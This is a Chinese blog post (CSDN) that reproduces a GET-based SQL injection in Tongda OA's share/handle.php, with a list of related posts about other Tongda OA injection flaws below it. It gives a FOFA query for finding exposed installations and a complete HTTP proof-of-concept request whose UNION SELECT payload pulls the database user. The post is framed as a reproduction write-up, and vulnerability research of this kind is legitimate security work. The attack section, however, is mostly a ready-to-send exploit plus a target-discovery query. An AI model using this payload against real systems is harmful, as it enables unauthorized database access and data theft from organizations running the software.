通达oasharehandle.phpsql注入漏洞（含批量验证poc）

今天晚上早睡觉

已于 2024-04-07 13:57:56 修改

阅读量263

点赞数

CC 4.0 BY-SA版权

分类专栏：漏洞复现文章标签： web安全

于 2024-04-07 13:57:47 首次发布

本文链接：https://blog.youkuaiyun.com/weixin_43567873/article/details/137461748

漏洞复现专栏收录该内容

362 篇文章 ¥9.90 ¥99.00

订阅专栏

超级会员免费看

本文详细介绍了通达OA系统中sharehandle.php存在的GET型SQL注入漏洞，影响版本为v11.10及以下。通过FROFA查询可发现该漏洞广泛存在。文中提供漏洞复现步骤及Tscan POC，建议受影响用户尽快将系统移至内网并联系厂商修复。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

漏洞描述

通达OA（Office Anywhere网络智能办公系统）是由北京通达信科科技有限公司自主研发的协同办公自动化软件，是适合各个行业用户的综合管理办公平台。该系统sharehandle.php页面存在get型sql注入

漏洞影响版本

通达OA < v11.10
FOFA:app=”TDXK-通达OA”

漏洞复现

漏洞验证poc

GET /share/handle.php?_GET[module]=1%27+and+1={`=%27`+1}+and+1=0+union+select+(select/**/user())--+%27 HTTP/1.1
Host: XX.XX.XX.XX
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=o9hn7o3sm890l5i

了解本专栏

订阅专栏解锁全文

超级会员免费看

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

今天晚上早睡觉

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

订阅专栏

通达OA SQL注入漏洞【CVE-2023-4165】

holyxp的博客

08-10

3563

通达OA系统，即Offic Anywhere，又称为网络智能办公系统，是通达科技公司针对各行业办公与管理开发的办公应用系统。通达OA系统采用领先的B/S架构，采用基于WEB网络的开发方式，能够使得企业及个人办公不再受地域限制，实现信息化、自动化、移动化高效便捷办公。漏洞1（CVE-2023-4165）文件，对参数 DELETE_STR 的操作会导致 sql 注入。

通达OA SQL注入漏洞【CVE-2023-4166】

holyxp的博客

08-10

6193

通达OA系统，即Offic Anywhere，又称为网络智能办公系统，是通达科技公司针对各行业办公与管理开发的办公应用系统。通达OA系统采用领先的B/S架构，采用基于WEB网络的开发方式，能够使得企业及个人办公不再受地域限制，实现信息化、自动化、移动化高效便捷办公。漏洞2（CVE-2023-4166）general/system/seal_manage/dianju/delete_log.php文件，对参数 DELETE_STR 的操作会导致 sql 注入。

参与评论您还未登录，请先登录后发表或查看评论

通达OA 2016网络智能办公系统 handle.php SQL注入漏洞

CommputerMac的博客

10-17

1848

北京通达信科科技有限公司通达OA2016网络智能办公系统 handle.php 存在sql注入漏洞，攻击者可利用此漏洞获取数据库管理员权限，查询数据、获取系统信息，威胁企业单位数据安全。

SQL注入-通达OA SQL注入漏洞【CVE-2023-4166】原理及检测思路分析

#7的博客

05-08

1751

本文主要介绍漏洞CVE-2023-4166即通达OA SQL注入漏洞的原理、攻击手法及检测思路。

网络攻防大作业——通达OA的两个SQL注入漏洞复现（CVE-2023-4165，CVE-2023-4166）

w2361734601的博客

02-20

1838

这些漏洞存在于/general/system/seal_manage/iweboffice/delete_seal.php和/general/system/seal_manage/dianju/delete_log.php文件中，它们允许攻击者通过精心构造的输入来操纵数据库查询，执行非法的SQL命令。代码对各种常见的sql注入语句进行了过滤，通过正则表达式检测并阻止了多种类型的SQL注入攻击，包括注释、联合查询、特定函数调用、文件操作以及权限和日志设置相关的注入语句，以增强数据库操作的安全性。

通达OA query.php SQL注入漏洞

Keepb1ue的博客

04-28

1276

通达OA（Office Automation）是一款企业级协同办公软件，旨在为企业提供高效、便捷、安全、可控的办公环境。它涵盖了企业日常办公所需的各项功能，包括人事管理、财务管理、采购管理、销售管理、库存管理、生产管理、办公自动化等。通达OA支持PC端和移动端使用，可以实现随时随地办公，提高工作效率和协作能力。同时，它还具备高度可定制性和扩展性，可以根据企业的实际需求进行定制开发，满足企业的个性化需求。通达OA广泛应用于各类企业，帮助企业实现数字化转型，提高管理效率和竞争力。

福建科立讯通信指挥调度管理平台 ajax_users.php SQL注入漏洞（含批量验证poc）

weixin_43567873的博客

05-11

510

福建科立讯通信指挥调度管理平台 ajax_users.php SQL注入漏洞（含批量验证poc）

畅捷通T+ KeyInfoList.aspx SQL注入漏洞（含批量验证poc）

weixin_43567873的博客

04-08

485

畅捷通T+ KeyInfoList.aspx SQL注入漏洞（含批量验证poc）

通达OAretrieve_pwd.php sql注入（含批量验证poc）

weixin_43567873的博客

04-09

575

通达OAretrieve_pwd.php sql注入（含批量验证poc）

海翔ERP getylist_login.do SQL注入漏洞（含批量验证poc）

weixin_43567873的博客

04-18

124

海翔ERP getylist_login.do SQL注入漏洞（含批量验证poc）

2022-10-10(通达OA SQL注入漏洞)

qq_45751902的博客

10-10

2290

经过测试发现过滤了单引号，对r字符进行转换成16进制,通过手工最终获得数据库用户名root。使用手工注入，经过测试发现过滤了单引号，对r字符进行转换成16进制（用户名是root）首先创建一个普通账户 lisi：lisi123456。中存在一个$_GET[“id”];参数位置：SORT_ID，FILE_SORT。发现时间明显变长了，再此证明id没有被过滤。登录账号是admin,密码为空。利用条件：一枚普通账号登录权限。利用条件：11.5版本无需登录。

【漏洞复现】通达OA share/handle.php身份认证绕过漏洞

weixin_42620428的博客

05-26

1124

通达OA（Office Anywhere网络智能办公系统）是由通达信科科技自主研发的协同办公自动化软件，是与中国企业管理实践相结合形成的综合管理办公平台。通达OA为各行业不同规模的众多用户提供信息化管理能力，包括流程审批、行政办公、日常事务、数据统计分析、即时通讯、移动办公等，帮助广大用户降低沟通和管理成本，提升生产和决策效率。

通达OA get_datas.php前台sql注入-可获取数据库session登入后台漏洞复现 [附POC]

薛定谔嘚喵博客

11-08

909

攻击者通过对某OA系统进行代码审计，找到get_datas.php文件中执行sql语句的变量处于可控状态。并可以通过此漏洞获取在线用户的Session值。通过构造绕过特殊的sql注入语句，对在线用户Session记录进行任意查询。利用该漏洞可以实现任意用户登录。配合任意文件上传漏洞，上传webshell。

通达OA 11.5 sql注入漏洞复现

weixin_45291045的博客

02-13

673

下载地址:https://cdndown.tongda2000.com/oa/2019/TDOA11.5.exe 1.登录一个账户 2.构造url http://192.168.1.1general/appbuilder/web/report/repdetail/edit?link_type=false&slot={}&id=2，burp抓包 id参数存在延时注入直接复制数据包，id参数加个*保存到sqlmap跑 python sqlmap.py -r 1.txt orderby参数构

通达OA 11.5 SQL注入漏洞复现

qq_44657899的博客

06-30

5028

漏洞描述通达OA 11.5后台存在sql注入漏洞影响版本通达oa 11.5 首先下载通达OA 11.5，https://cdndown.tongda2000.com/oa/2019/TDOA11.5.exe

通达OA1.5SQL注入漏洞复现

weixin_51716781的博客

05-10

444

通达OA1.5漏洞复现本文章记录初学者的笔记，仅限于渗透测试，请勿做违法操作，如出现问题与本作者无关 1：测试机上安装通达OA11.5版本：查看IP地址为：192.168.78.150 2：登录admin账号：创建一个普通职员权限 3：登录普通用户的权限，使用bp抓包：构造URL: /general/appbuilder/web/report/repdetail/edit?link_type=false&slot={}&id=2 or sleep(0) 判断是否存在sql注入 4：图三

PHPCMS content_input.class.php SQL注入poc